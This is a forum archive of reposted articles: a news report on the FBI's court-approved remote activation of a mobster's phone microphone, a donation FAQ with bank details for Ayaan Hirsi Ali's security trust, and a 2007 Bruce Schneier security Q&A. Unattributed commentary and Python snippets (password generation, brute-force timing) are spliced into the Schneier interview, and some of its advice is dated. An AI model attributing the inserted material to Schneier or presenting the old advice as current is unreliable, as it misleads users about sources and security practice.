week by U.S. District Judge Lewis Kaplan. He ruled that the “roving
bug” was legal because federal wiretapping law is broad enough to
permit eavesdropping even of conversations that take place near a
suspect’s cell phone.

Kaplan’s opinion said that the eavesdropping technique “functioned
whether the phone was powered on or off.” Some handsets can’t be fully
powered down without removing the battery; for instance, some Nokia
models will wake up when turned off if an alarm is set. While the
Genovese crime family prosecution appears to be the first time a
remote-eavesdropping mechanism has been used in a criminal case, the
technique has been discussed in security circles for years.

The U.S. Commerce Department’s security office warns that “a cellular
telephone can be turned into a microphone and transmitter for the
purpose of listening to conversations in the vicinity of the phone.”
An article in the Financial Times last year said mobile providers can
“remotely install a piece of software on to any handset, without the
owner’s knowledge, which will activate the microphone even when its
owner is not making a call.”

Nextel and Samsung handsets and the Motorola Razr are especially
vulnerable to software downloads that activate their microphones, said
James Atkinson, a counter-surveillance consultant who has worked
closely with government agencies. “They can be remotely accessed and
made to transmit room audio all the time,” he said. “You can do that
without having physical access to the phone.”

Because modern handsets are miniature computers, downloaded software
could modify the usual interface that always displays when a call is
in progress. The spyware could then place a call to the FBI and
activate the microphone–all without the owner knowing it happened.
(The FBI declined to comment on Friday.) “If a phone has in fact been
modified to act as a bug, the only way to counteract that is to either
have a bugsweeper follow you around 24-7, which is not practical, or
to peel the battery off the phone,” Atkinson said. Security-conscious
corporate executives routinely remove the batteries from their cell
phones, he added.

FBI’s physical bugs discovered

The FBI’s Joint Organized Crime Task Force, which includes members of
the New York police department, had little luck with conventional
surveillance of the Genovese family. They did have a confidential
source who reported the suspects met at restaurants including Brunello
Trattoria in New Rochelle, N.Y., which the FBI then bugged.

But in July 2003, Ardito and his crew discovered bugs in three
restaurants, and the FBI quietly removed the rest. Conversations
recounted in FBI affidavits show the men were also highly suspicious
of being tailed by police and avoided conversations on cell phones
whenever possible.

That led the FBI to resort to “roving bugs,” first of Ardito’s Nextel
handset and then of Peluso’s. U.S. District Judge Barbara Jones
approved them in a series of orders in 2003 and 2004, and said she
expected to “be advised of the locations” of the suspects when their
conversations were recorded.

Details of how the Nextel bugs worked are sketchy. Court documents,
including an affidavit (p1) and (p2) prepared by Assistant U.S.
Attorney Jonathan Kolodner in September 2003, refer to them as a
“listening device placed in the cellular telephone.” That phrase could
refer to software or hardware.

One private investigator interviewed by CNET, Skipp Porteous
of Sherlock Investigations in New York, said he believed the FBI
planted a physical bug somewhere in the Nextel handset and did not
remotely activate the microphone. “They had to have physical
possession of the phone to do it,” Porteous said. “There are several
ways that they could have gotten physical possession. Then they
monitored the bug from fairly near by.”

But other experts thought microphone activation is the more likely
scenario, mostly because the battery in a tiny bug would not have
lasted a year and because court documents say the bug works anywhere
“within the United States”–in other words, outside the range of a
nearby FBI agent armed with a radio receiver.

In addition, a paranoid Mafioso likely would be suspicious of any ploy
to get him to hand over a cell phone so a bug could be planted. And
Kolodner's affidavit seeking a court order lists Ardito's phone
number, his 15-digit International Mobile Subscriber Identifier, and
Nextel Communications as the service provider, all of which would be
unnecessary if a physical bug were being planted.

A BBC article from 2004 reported that intelligence agencies routinely
employ the remote-activation method. "A mobile sitting on the desk of
a politician or businessman can act as a powerful, undetectable bug,”
the article said, “enabling them to be activated at a later date to
pick up sounds even when the receiver is down.”

For its part, Nextel said through spokesman Travis Sowders: “We’re not
aware of this investigation, and we weren’t asked to participate.”
Other mobile providers were reluctant to talk about this kind of
surveillance. Verizon Wireless said only that it “works closely with
law enforcement and public safety officials. When presented with
legally authorized orders, we assist law enforcement in every way
possible.” A Motorola representative said that “your best source in
this case would be the FBI itself.” Cingular, T-Mobile, and the CTIA
trade association did not immediately respond to requests for comment.

Mobsters: The surveillance vanguard

This isn’t the first time the federal government has pushed at the
limits of electronic surveillance when investigating reputed mobsters.
In one case involving Nicodemo S. Scarfo, the alleged mastermind of a
loan shark operation in New Jersey, the FBI found itself thwarted when
Scarfo used Pretty Good Privacy software (PGP) to encode confidential
business data. So with a judge’s approval, FBI agents repeatedly snuck
into Scarfo's business to plant a keystroke logger and monitor its
output.

Like Ardito’s lawyers, Scarfo’s defense attorneys argued that the then-
novel technique was not legal and that the information gleaned through
it could not be used. Also like Ardito, Scarfo’s lawyers lost when a
judge ruled in January 2002 that the evidence was admissible. This
week, Judge Kaplan in the southern district of New York concluded that
the “roving bugs” were legally permitted to capture hundreds of hours
of conversations because the FBI had obtained a court order and
alternatives probably wouldn’t work.

The FBI’s “applications made a sufficient case for electronic
surveillance,” Kaplan wrote. “They indicated that alternative methods
of investigation either had failed or were unlikely to produce
results, in part because the subjects deliberately avoided government
surveillance."

Bill Stollhans, president of the Private Investigators Association of
Virginia, said such a technique would be legally reserved for police
armed with court orders, not private investigators. There is “no law
that would allow me as a private investigator to use that type of
technique,” he said. “That is exclusively for law enforcement. It is
not allowable or not legal in the private sector. No client of mine
can ask me to overhear telephone or strictly oral conversations.”

Surreptitious activation of built-in microphones by the FBI has been
done before. A 2003 lawsuit revealed that the FBI was able to
surreptitiously turn on the built-in microphones in automotive systems
like General Motors’ OnStar to snoop on passengers’ conversations.
When FBI agents remotely activated the system and were listening in,
passengers in the vehicle could not tell that their conversations were
being monitored.

Malicious hackers have followed suit. A report last year said Spanish
authorities had detained a man who wrote a Trojan horse that secretly
activated a computer's video camera and forwarded him the recordings.

From the archive, originally posted by: [ spectre ]


I CAN THINK OF A FEW OTHER PEOPLE THIS COULD WORK FOR

“An outspoken defender of women’s rights in Islamic societies, Ms.
Hirsi Ali was born in Mogadishu, Somalia. She escaped an arranged
marriage by immigrating to the Netherlands in 1992, and served as a
member of the Dutch parliament from 2003 to 2006. In parliament, she
worked on furthering the integration of non-Western immigrants into
Dutch society, and on defending the rights of women in Dutch Muslim
society. In 2004, together with director Theo van Gogh, she made
Submission, a film about the oppression of women in conservative
Islamic cultures. The airing of the film on Dutch television resulted
in the assassination of van Gogh by an Islamic extremist.  At AEI, Ms.
Hirsi Ali will be researching the relationship between the West and
Islam; women’s rights in Islam; violence against women propagated by
religious and cultural arguments; and Islam in Europe.”


Frequently Asked Questions about the Ayaan Hirsi Ali Security Trust
Answered by Sam Harris

1. As a bestselling author, can’t Ayaan Hirsi Ali afford to pay for
her own protection?

For security reasons, I cannot give specific information about the
arrangements that have been made for Ayaan Hirsi Ali, but I can say
that the average security costs for people with similar security
profiles can be in excess of two million dollars per year. Needless to
say, very few writers sell enough books to cover such an extraordinary
expense (and Ayaan Hirsi Ali is not among them).

This might seem like an outrageous sum to spend so that one woman can
safely stand at a university lectern and speak about the power of
reason and the rights of little girls–and it is an outrageous sum and
an outrageous circumstance. It is, of course, galling that a mere
advocate of human rights and basic rationality should require special
protection in the United States. But this is simply a fact of life in
a world where freedom of speech and conscience falls ever more under
the shadow of Muslim fanaticism. In my opinion, there is no one making
a more heroic effort to change this fact than Ayaan Hirsi Ali.

2. In your original appeal, you wrote that “if every reader of this
email simply pledged ten dollars a month to protect Ayaan Hirsi Ali,
the costs of her security would be covered for as long as the threat
to her life remains.” How can you say this if you don’t know how far
the email has spread? And if you only need $10 from each person, why
does the security page have options to give as much as $1000 per
month?

The idea of offering a monthly subscription was to allow everyone to
make a meaningful contribution to Ms. Hirsi Ali’s protection. Given
what I know about the general costs of security, and the fact that the
original email went out to over 15,000 people, it was correct to say
that Ms. Hirsi Ali’s needs would be largely met if everyone gave $10 a
month indefinitely. However, the truth is that only about half of the
people receiving the email will open it; fewer will read it; and fewer
still will donate.

I would be extremely happy if we could meet Ms. Hirsi Ali’s security
needs in a grassroots way, with small donations, but this is not
realistic. Protecting her will require some much larger gifts of
money. Such gifts are still needed and actively being sought.

3. Aren’t there more important causes to support than the protection
of Ayaan Hirsi Ali?

There are countless worthy targets for our generosity. Whether it is
helping to alleviate hunger in the developing world or building a new
pediatric hospital in the United States, one must choose between
absolute need and absolute need, and such choices often defy rational analysis.

Allow me to briefly make the case, however, that in this wilderness of
competing needs and limited resources, the ongoing protection of Ayaan
Hirsi Ali deserves our special commitment. In fact, few projects
represent such a perfect marriage of moral and intellectual necessity.
While the threat of Muslim extremism still seems distant to many of us
living in the developed world, I think it is the one problem that has
the potential to suddenly eclipse all others.

When one considers the cascading effects of what 19 jihadists did with
box-cutters on September 11th, 2001–now measured in the trillions of
dollars–it is difficult to imagine how the world might look after a
single incident of nuclear terrorism. I think it is safe to say,
however, that if we do suffer even one such attack, global warming
will seem the least of our concerns. For this reason, I think that the
superstition and bigotry that currently plagues Muslim communities,
East and West, is the most pressing issue of our time. I know of no
person better placed to awaken the world to the scope of this growing
emergency than Ayaan Hirsi Ali.

4. Might this just be a waste of money? Do bodyguards actually make a difference?

Anyone who doubts the effectiveness of professional security should
remember that Ms. Hirsi Ali’s colleague, Theo van Gogh, having
declined diplomatic protection of his own, was immediately murdered on
an Amsterdam street. It is true that no security can be perfect,
especially when one’s enemies are willing to commit suicide. But the
fact that U.S. diplomats successfully travel to places like Kabul and
Baghdad demonstrates that the combination of intelligence, secrecy,
and armed protection can make a difference. It is safe to say that Ms.
Hirsi Ali is only alive today because the Dutch gave her diplomatic
protection the moment she started receiving death threats in 2002.

5. Isn’t it true that the Dutch would still protect Ayaan Hirsi Ali if
she remained in Holland?

The Dutch government has said as much. But the offer does not seem to
be in good faith. The threat to Ms. Hirsi Ali is actually greatest in
Holland, and it is much more expensive to protect her there. In fact,
the security precautions necessary to keep her safe in Holland are
quite stifling. She is much better placed in the U.S. to do her work.
(For more on this subject, please see the opinion piece I wrote with
Salman Rushdie).

6. Why single out Ayaan Hirsi Ali? Don’t other Muslim dissidents need
our support?

There surely are other Muslim dissidents who are threatened and
deserve our support. Ayaan Hirsi Ali is the most visible, however. In
the event we raise enough money for her security, we will help others
as well. Several of us are in the process of forming non-profit
foundations for this larger purpose.

7. What will you do with the money, if you don’t raise enough of it?

The Ayaan Hirsi Ali Security Trust will pay for Ms. Hirsi Ali’s
security until the money runs out. Hopefully we will raise enough to
cover her needs indefinitely. If we do not raise enough money, and no
government steps forward to offer her diplomatic protection, Ms. Hirsi
Ali could be forced to stop doing her work and enter the witness
protection program. Hopefully it will never come to that.

8. What will you do if you raise more money than is needed?

Given the costs of Ms. Hirsi Ali’s security, excess funds are not
expected. However, if we raise enough money to cover Ms. Hirsi Ali’s
security, I will send an announcement by email to every person who has
donated to the Security Trust through this website. This will give
people a choice about whether to continue to give to a surplus fund. I
will, of course, make a similar announcement if Ms. Hirsi Ali is ever
given diplomatic protection by the U.S. government (or any other).

The surplus fund will be used to support other dissidents and public
intellectuals in the Muslim world – through conferences, media events,
publications, or by making similar efforts to pay for their security.

9. Ayaan Hirsi Ali works for the American Enterprise Institute–a
“neoconservative” think-tank. Why should liberals support her?

Ms. Hirsi Ali’s cause transcends politics and should motivate liberals
and conservatives equally. The American Enterprise Institute, to its
great credit and to the enduring shame of my fellow liberals, was the
only think-tank to offer Ms. Hirsi Ali a job when her security
concerns finally forced her to leave Holland. Even if you find the
views of certain AEI fellows as objectionable as I do, please
recognize that Ayaan Hirsi Ali is an independent scholar. The AEI
deserves credit for having the courage and wisdom to support her.
Donations to the Ayaan Hirsi Ali Security Trust do not go to (or
through) the AEI.

10. How widely is this appeal being circulated? Is this only a secular
effort, or have you reached out to Christians and moderate Muslims as well?

I’ve reached out to everyone I think could be helpful, including
people like Pastor Rick Warren. I am very happy to say that Pastor
Warren responded immediately (as fast as the fastest atheist) and
pledged to help. I’ve also sent this appeal to my few contacts among
practicing Muslims. Needless to say, I think it would be only fitting
if moderate Muslims helped protect Ayaan Hirsi Ali from the immoderate ones.

11. Is there a risk that a high profile appeal such as this might be
seen as a victory by the extremists who threaten Muslim apostates?

From my point of view, we don’t have the luxury of worrying about
this. I think our society should be devoting immense resources to the
problem of encouraging and protecting dissidents in the Muslim world.
Until governments realize this, private citizens will have to do what
they can. The real victory for the extremists would be if someone like
Ayaan Hirsi Ali could no longer make public appearances and do her work.

12. Will you personally be giving to the Security Trust every month?


Questions about the Ayaan Hirsi Ali Security Trust can be sent to:
author [at] samharris [dot] org
Please have the subject line read: “Question about the Security Trust”


Thank you for your interest in helping Ayaan Hirsi Ali. If you would
like more information about her, you can find it here:

All contributions made below go directly to the Ayaan Hirsi Ali
Security Trust. This private trust is dedicated to financing Ms. Hirsi
Ali’s security and can accept donations both from within the United
States and internationally.

While one-time donations will be deeply appreciated, please consider
setting up a monthly subscription on your credit card. A monthly
subscription can allow anyone to make a meaningful contribution toward
Ms. Hirsi Ali’s security without incurring great expense up front.

Unfortunately, donations to the Ayaan Hirsi Ali Security Trust are not
tax-deductible, as U.S. law does not currently allow for charitable
contributions to be directed toward a single individual. However, if a
tax-deduction is important to you, a more general charity has been set
up, the Foundation for Freedom of Expression, whose mission is to help
protect Ayaan Hirsi Ali as well as other dissidents in the Muslim
world. Tax-deductible donations to the foundation may be sent by check
or wire-transfer directly to:

The Foundation for Freedom of Expression, Inc
Bank of Georgetown
1054 31st Street, N.W., Suite 18
Washington, DC 20007
Telephone: 202-355-1200
Account Number: 1010054805
Bank Routing Number: 054001712
Employer Identification Number (EIN): 33-1185369

Monthly Subscription
Use this form to set up a recurring monthly donation.

Payment by Check
Checks should be made payable to the Ayaan Hirsi Ali Security Trust
and sent to:

Ayaan Hirsi Ali Security Trust

Bank of Georgetown
1054 31st Street, N.W.
Suite 18
Washington, DC 20007
Ayaan Hirsi Ali Trust Tax Identification Number: 75-6826872

Wire Transfer from within the U.S.

Account Name: Ayaan Hirsi Ali Security Trust
Account Number: 1010054748
Bank Name: Bank of Georgetown
Bank Address: 1054 31st Street, N.W., Suite 18, Washington, DC 20007
Bank Telephone: 202-355-1200
Bank Routing Number: 054001712

International Wire Transfer

For international wire transfers from outside the U.S. to the bank
accounts of the Ayaan Hirsi Ali Security Trust, you can also wire to
the Netherlands bank account of Dorchester House B.V., which has
dedicated one of its accounts to supporting the security of Ms. Hirsi
Ali. All donations and contributions to this account will be forwarded
to the US bank account of the Security Trust, and no bank or other
expenses will be charged. All cash flow is supervised by external
chartered accountants of the Ayaan Hirsi Ali Security Trust.

Donations can be made to:

Dorchester House B.V., Amsterdam
Account number: 4732822 with Postbank NV, Amsterdam
IBAN number: NL61PSTB0004732822
BIC/SWIFT code bank: PSTBNL21 Postbank NV, Amsterdam

Please note, however, that the USA does not use IBAN numbers. Use the
‘account number’ 1010054748 instead. Also, you will need the routing
number 054001712 (also known as a FedWire or ABA number). Like most US
financial institutions, the Bank of Georgetown uses this (ABA) number
as its only routing type, and the SWIFT/BIC code is NOT used.



From the archive, originally posted by: [ spectre ]


Bruce Schneier Blazes Through Your Questions
By Stephen J. Dubner  /  December 4, 2007

Last week, we solicited your questions for Internet security guru
Bruce Schneier. He responded in force, taking on nearly every
question, and his answers are extraordinarily interesting, providing
mandatory reading for anyone who uses a computer. He also plainly
thinks like an economist: search below for “crime pays” to see his
sober assessment of why it’s better to earn a living as a security
expert than as a computer criminal.

Thanks to Bruce and to all of you for participating. Here’s a note
that Bruce attached at the top of his answers: “Thank you all for your
questions. In many cases, I’ve written longer essays on the topics
you’ve asked about. In those cases, I’ve embedded the links into the
necessarily short answers I’ve given here.”

Q: Assuming we are both still here in 50 years, what do you believe
will be the most incredible, fantastic, mind-blowing advance in
computers/technology at that time?

A: Fifty years is a long time. In 1957, fifty years ago, there were
fewer than 2,000 computers total, and they were essentially used to
crunch numbers. They were huge, expensive, and unreliable; sometimes,
they caught on fire. There was no word processing, no spreadsheets, no
e-mail, and no Internet. Programs were written on punch cards or paper
tape, and memory was measured in thousands of digits. IBM sold a disk
drive that could hold almost 4.5 megabytes, but it was five-and-a-half
feet tall by five feet deep and would just barely fit through a
standard door.

Read the science fiction from back then, and you’d be amazed by what
they got wrong. Sure, they predicted smaller and faster, but no one
got the socialization right. No one predicted eBay, instant messages,
or blogging.

Moore’s Law predicts that in fifty years, computers will be a billion
times more powerful than they are today. I don’t think anyone has any
idea of the fantastic emergent properties you get from a billion-times
increase in computing power. (I recently wrote about what security
would look like in ten years, and that was hard enough.) But I can
guarantee that it will be incredible, fantastic, and mind-blowing.
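Schneier's "billion times" figure can be sanity-checked with a quick back-of-the-envelope calculation. This sketch assumes performance doubles roughly every 18 months (one common statement of Moore's Law; the exact period is an assumption for illustration, not a figure from the interview):

```python
# Back-of-the-envelope check of the "billion times in fifty years" figure.
# Assumes a doubling roughly every 18 months -- an illustrative reading
# of Moore's Law, not something stated in the interview.
years = 50
doubling_period_years = 1.5
doublings = years / doubling_period_years   # ~33 doublings
factor = 2 ** doublings                     # ~1e10: on the order of billions
print(f"{doublings:.1f} doublings -> growth factor {factor:.2e}")
```

Roughly 33 doublings gives a factor near ten billion, so "a billion times more powerful" is, if anything, conservative under this assumption.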

Q: With regard to identity theft, do you see any alternatives to data
being king? Do you see any alternative systems which will mean that
just knowing enough about someone is not enough to commit a crime?

A: Yes. Identity theft is a problem for two reasons. One, personal
identifying information is incredibly easy to get; and two, personal
identifying information is incredibly easy to use. Most of our
security measures have tried to solve the first problem. Instead, we
need to solve the second problem. As long as it’s easy to impersonate
someone if you have his data, this sort of fraud will continue to be a
major problem.

The basic answer is to stop relying on authenticating the person, and
instead authenticate the transaction. Credit cards are a good example
of this. Credit card companies spend almost no effort authenticating
the person — hardly anyone checks your signature, and you can use your
card over the phone, where they can’t even check if you’re holding the
card — and spend all their effort authenticating the transaction. Of
course it’s more complicated than this; I wrote about it in more
detail here and here.

Q: What’s the next major identity verification system?

A: Identity verification will continue to be the hodge-podge of
systems we have today. You’re recognized by your face when you see
someone you know; by your voice when you talk to someone you know.
Open your wallet, and you’ll see a variety of ID cards that identify
you in various situations — some by name and some anonymously. Your
keys “identify” you as someone allowed in your house, your office,
your car. I don’t see this changing anytime soon, and I don’t think it
should. Distributed identity is much more secure than a single system.
I wrote about this in my critique of REAL ID.

Q: If we can put a man on the moon, why in the world can’t we design a
computer that can “cold boot” nearly instantaneously? I know about
hibernation, etc., but when I do have to reboot, I hate waiting those
three or four minutes.

A: Of course we can; the Amiga was a fast-booting computer, and OpenBSD
boxes boot in less than a minute. But the current crop of major
operating systems just don’t. This is an economics blog, so you tell
me: why don’t the computer companies compete on boot-speed?

Q: Considering the carelessness with which the government (state and
federal) and commercial enterprises treat our confidential
information, is it essentially a waste of effort for us as individuals
to worry about securing our data?

A: Yes and no. More and more, your data isn’t under your direct
control. Your e-mail is at Google, Hotmail, or your local ISP. Online
merchants like Amazon and eBay have records of what you buy, and what
you choose to look at but not buy. Your credit card company has a
detailed record of where you shop, and your phone company has a
detailed record of who you talk to (your cell phone company also knows
where you are). Add medical databases, government databases, and so
on, and there’s an awful lot of data about you out there. And data
brokers like ChoicePoint and Acxiom collect all of this data and more,
building up a surprisingly detailed picture on all Americans.

As you point out, one problem is that these commercial and government
organizations don’t take good care of our data. It’s an economic
problem: because these parties don’t feel the pain when they lose our
data, they have no incentive to secure it. I wrote about this two
years ago, stating that if we want to fix the problem, we must make
these organizations liable for their data losses. Another problem is
the law; our Fourth Amendment protections protect our data under our
control — which means in our homes, in our cars, and on our computers.
We don’t have nearly the same protection when we give our data to some
other organization for use or safekeeping.

That being said, there’s a lot you can do to secure your own data. I
give a list here.

Q: How do you remember all of your passwords?

A: I can’t. No one can; there are simply too many. But I have a few
strategies. One, I choose the same password for all low-security
applications. There are several Web sites where I pay for access, and
I have the same password for all of them. Two, I write my passwords
down. There’s this rampant myth that you shouldn’t write your
passwords down. My advice is exactly the opposite. We already know how
to secure small bits of paper. Write your passwords down on a small
bit of paper, and put it with all of your other valuable small bits of
paper: in your wallet. And three, I store my passwords in a program I
designed called Password Safe. It’s a small application — Windows
only, sorry — that encrypts and secures all your passwords.

Here are two other resources: one concerning how to choose secure
passwords (and how quickly passwords can be broken), and one on how
lousy most passwords actually are.
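The advice above (pick strong passwords, then write them down or keep them in an encrypted safe) pairs naturally with generating passwords randomly rather than inventing them. A minimal sketch using Python's standard `secrets` module; the alphabet and length here are illustrative choices, not anything Schneier prescribes:

```python
import math
import secrets
import string

def make_password(length: int = 16) -> str:
    """Generate a random password with a cryptographically secure RNG."""
    alphabet = string.ascii_letters + string.digits + "!@#$%^&*"  # 70 symbols
    return "".join(secrets.choice(alphabet) for _ in range(length))

# Entropy grows linearly with length: length * log2(alphabet size) bits.
bits = 16 * math.log2(70)   # ~98 bits for a 16-character password
```

A password like this is far too strong to guess but impossible to remember, which is exactly why it belongs on that slip of paper in your wallet or in a password safe.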

Q: What’s your opinion of the risks of some of the new (and upcoming)
online storage services, such as Google’s GDrive or Microsoft’s Live
Drive? Most home computer users don’t adequately safeguard or backup
their storage, and these services would seem to offer a better-
maintained means of storing files; but what do users risk by storing
that much important information with organizations like Google or Microsoft?

A: Everything I wrote in my answer to the identity theft question
applies here: when you give a third party your data, you have to both
trust that they will protect it adequately, and hope that they won’t
give it all to the government just because the government asks nicely.
But you’re certainly right, data loss is the number one risk for most
home users, and network-based storage is a great solution for that. As
long as you encrypt your data, there’s no risk and only benefit.

Q: Do you think that in the future, everything will go from hard-wired
to wireless? If so, with cell phones, radios, satellites, radar, etc.
using all the airwaves (or spectrum), do you think there is a
potential for, well, messing everything up? What about power outages
and the such?

A: Wireless is certainly the way of the future. From a security
perspective, I don’t see any major additional risks. Sure, there’s a
potential for messing everything up, but there was before. Same with
power outages. Data transmitted wirelessly should probably be
encrypted and authenticated; but it should have been over wires, too.
The real risk is complexity. Complexity is the worst enemy of
security; as systems become more complex, they get less secure. It’s
not the addition of wireless per se; it’s the complexity that wireless
— and everything else — adds.

Q: There has been some work to date on the cost-benefit economics of
security. In your estimation, is this a sound approach to motivate
better security, and do you think it is doomed to begin with since
society disproportionately values other things before it values
security? If so, do you think it’s time for us to take up digital
pitchforks and shine some light on the economic gatekeepers’ personal

A: Security is a trade-off, just like anything else. And it’s not true
that we always disproportionately value other things before security.
Look at our terrorism policies; when we’re scared, we value security
disproportionately before all other things. Looking at security
through the lens of economics (as I did here) is the only way to
understand how these motivations work and what level of security is
optimal for society. Not that I’m discouraging you from picking up
your digital pitchforks. People have an incredibly complex
relationship with security — read my essay on the psychology of
security, and this one on why people are so bad at judging risks — and
the more information they have, the better.

Q: Is there an equilibrium point in which the cost (either financial
or time) of hacking a password becomes more expensive than the value
of the data? If so what is it?

A: Of course, but there are too many variables to answer the question.
The cost of password guessing is constantly going down, and the value
of the data depends on the data. In general, though, we’ve long
reached a point where the complexity of passwords an average person is
willing to remember is less than the complexity of passwords necessary
to be secure against a password-guessing attack. (This is for
passwords that can be guessed offline only. Four-digit PINs are still
okay if the bank disables your account after a few wrong guesses.)
That’s why I recommend that people write their passwords down, as I
said before.
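The offline-versus-online distinction Schneier draws can be made concrete with rough numbers. The guess rates below are illustrative assumptions, not figures from the interview:

```python
def seconds_to_exhaust(alphabet_size: int, length: int,
                       guesses_per_sec: float) -> float:
    """Worst-case time to try every candidate password of a given length."""
    return alphabet_size ** length / guesses_per_sec

# Offline attack on a leaked hash file, assuming ~10 billion guesses/sec:
# an 8-character all-lowercase password falls in about 21 seconds.
offline = seconds_to_exhaust(26, 8, 1e10)

# Online attack against a server, assuming ~10 guesses/sec and no lockout:
# even a 4-digit PIN takes 1000 seconds -- which is why a bank that
# disables the account after a few wrong guesses makes short PINs workable.
online = seconds_to_exhaust(10, 4, 10)
```

The asymmetry is the point: offline attackers get the full guess rate of their hardware, while online attackers are throttled by the server, so the password complexity people can memorize only suffices in the rate-limited case.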

Q: With over a billion people using computers today, what is the real
threat to the average person?

A: It’s hard not to store sensitive information (like social security
numbers) on your computer. Even if you don’t type it yourself, you
might receive it in an e-mail or file. And then, even if you delete
that file or e-mail, it might stay around on your hard drive. And lots
of people like the convenience of Internet banking, and even more like
to use their computers to help them do their jobs — which means
company secrets will end up on those computers.

The most immediate threat to the average person is crime — in
particular, fraud. And as I said before, even if you don’t store that
data on your computer, someone else has it on theirs. But the long-
term threat of loss of privacy is much greater, because it has the
potential to change society for the worse.

Q: What is the future of electronic voting?

A: I’ve written a lot about this issue (see here and here as well).
Basically, the problem is that the secret ballot means that most of
the security tricks we use in things like electronic funds transfers
don’t work in voting machines. The only workable solution against
hacking the voting machines, or — more commonly — innocent programming
errors, is something called a voter-verifiable paper trail. Vote on
whatever touch-screen machine you want in whatever way you want. Then,
that machine must spit out a printed piece of paper with your vote on
it, which you have the option of reviewing for accuracy. The machine
collects the votes electronically for a quick tally, and the paper is
the actual vote in case of recounts. Nothing else is secure.

Q: Do you think Google will be able to eliminate the presence of phony
malware sites on its search pages? And what can I do to ensure I’m not
burned by the same?

A: Google is trying. The browsers are trying. Everyone is trying to
alert users about phishing, pharming, and malware sites before they’re
taken in. It’s hard; the criminals spend a lot of time trying to stay
one step ahead of these identification systems by changing their URLs
several times a day. It’s an arms race: we’re not winning right now,
but things will get better.

As for how not to be taken in by them, that’s harder. These sites are
an example of social engineering, and social engineering preys on the
natural tendency of people to believe their own eyes. A good bullshit
detector helps, but it’s hard to teach that. Specific phishing,
pharming, and other tactics for trapping unsuspecting people will
continue to evolve, and this will continue to be a problem for a long time.

Q: I recently had an experience on eBay in which a hacker copied and
pasted an exact copy of my selling page with the intention of routing
payments to himself. Afterwards, people informed me that such mischief
is not uncommon. How can I ensure that it doesn’t happen again?

A: You can’t. The attack had nothing to do with you. Anyone with a
browser can copy your HTML code — if they couldn’t, they couldn’t see
your page — and repost it at another URL. Welcome to the Internet.

Q: All ethics aside, do you think you could make more money obtaining
sensitive information about high net worth individuals and using
blackmail/extortion to get money from them, instead of writing books,
founding companies, etc.?

A: Basically, you’re asking if crime pays. Most of the time, it
doesn’t, and the problem is the different risk characteristics. If I
make a computer security mistake — in a book, for a consulting client,
at BT — it’s a mistake. It might be expensive, but I learn from it and
move on. As a criminal, a mistake likely means jail time — time I
can’t spend earning my criminal living. For this reason, it’s hard to
improve as a criminal. And this is why there are more criminal
masterminds in the movies than in real life.

Q: Nearly every security model these days seems to boil down to the
fact that there must be some entity in which you place your trust. I
have to trust Google to keep my personal data and passwords secure
every time I check my mail, even as they’re sharing it across their
Google Reader, Google Maps, and Google Notebook applications. Even in
physical security models, you usually have to trust someone (e.g., the
security guard at the front desk, or the police). In your opinion, is
there a business/economic reason for this, or do you see this paradigm
eventually becoming a thing of the past?

A: There is no part of human social behavior that doesn’t involve
trust of some sort. Short of living as a hermit in a cave, you’re
always going to have to trust someone. And as more of our interactions
move online, we’re going to have to trust people and organizations
over networks. The notion of “trusted third parties” is central to
security, and to life.

Q: What do you think about the government or a pseudo-governmental
agency acting as a national or global repository for public keys? If
this were done, would the government insist on a back-door?

A: There will never be a global repository for public keys, for the
same reason there isn’t a single ID card in your wallet. We are more
secure with distributed identification systems. Centralized systems
are more valuable targets for criminals, and hence harder to secure. I
also have other problems with public-key infrastructure in general.

And the government certainly might insist on a back door into those
systems; they’re insisting on access to a lot of other systems.

Q: What do you think needs to be done to thwart all of the Internet-
based attacks that happen? Why is it that no single company or
government agency has yet to come up with a solution?

A: That’s a tall order, and of course the answer to your question is
that it can’t be done. Crime has been part of our society since our
species invented society, and it’s not going away anytime soon. The
real question is, “Why is there so much crime and hacking on the
Internet, and why isn’t anyone doing anything about it?”

The answer is in the economics of Internet vulnerabilities and
attacks: the organizations that are in the position to mitigate the
risks aren’t responsible for the risks. This is an externality, and if
you want to fix the problem you need to address it. In this essay
(more here), I recommend liabilities; companies need to be liable for
the effects of their software flaws. A related problem is that the
Internet security market is a lemons market (discussed here), but
there are strategies for dealing with that, too.

Q: You have repeatedly maintained that most of the investments that
the government has made towards counter-terrorism are largely
“security theater,” and that the real way to combat terrorism is to
invest in intelligence. However, Tim Weiner’s book, Legacy of Ashes,
says that the U.S. government is particularly inept at gathering and
processing intelligence. Does that leave us with no hope at all?

A: I’m still a fan of intelligence and investigation (more here) and
emergency response (more here). No, neither is perfect, but they’re
way better than the “defend the target” or “defend against the tactic”
thinking we have now. (I’ve written more about this here.) Basically,
security that only forces the bad guy to make a minor change in his
plot is largely a waste of money.

On the other hand, the average terrorist seems to be quite the idiot.
How you can help: refuse to be terrorized.

Q: I travel a lot and am continually frustrated with airport security.
What can we, the little people, do to help ease these frustrations
(besides taking a deep breath and strapping on our standard-issue
orange jumpsuits, I mean)?

A: I share your frustration, and I have regularly written about
airport security. But I got to do something you can’t do, and that’s
take it out on the TSA director, Kip Hawley. I recommend this
interview if you are interested in seeing him try to answer — and not
answer — my questions about ID checks, the liquid ban, screeners that
continually do badly in tests, the no-fly list, and the cover-your-ass
security that continues to cost us time and money without making us
appreciably safer.

As to what you can do: complain to your elected officials, and vote.

Q: What kinds of incentives can organizations put into place to 1)
decrease the effectiveness of social engineering, and 2) persuade
individuals to take an appropriate level of concern with respect to
organizational security? Are you aware of any particularly creative
solutions to these problems?

A: Social engineering will always be easy, because it attacks a
fundamental aspect of human nature. As I said in my book, Beyond Fear,
“social engineering will probably always work, because so many people
are by nature helpful and so many corporate employees are naturally
cheerful and accommodating. Attacks are rare, and most people asking
for information or help are legitimate. By appealing to the victim’s
natural tendencies, the attacker will usually be able to cozen what
she wants.”

The trick is to build systems that the user cannot subvert, whether by
malice, accident, or trickery. This will also help with the other
problem you list: convincing individuals to take organizational
security seriously. This is hard to do, even in the military, where
the stakes are much higher.

Q: I am someone who knows little to nothing about computers. As such,
what advice would you give to someone like me who wants to become
educated on the topic?

A: There are probably zillions of books and classes on basic computer
and Internet skills, and I wouldn’t even know where to begin to
suggest one. Okay, that’s a lie. I do know where to begin. I would
Google “basic computer skills” and see what comes up.

But I don’t think that people should need to become computer experts,
and computer security experts, in order to successfully use a
computer. I’ve written about home computer users and security here.

Q: How worried are you about terrorists or other criminals hacking
into the computer systems of dams, power plants, air traffic control
towers, etc.?

A: Not very. Of course there is a security risk here, but I think it’s
overblown. And I definitely think the risk of cyberterrorism is
overblown (for more on this, see here, as well as this related essay).

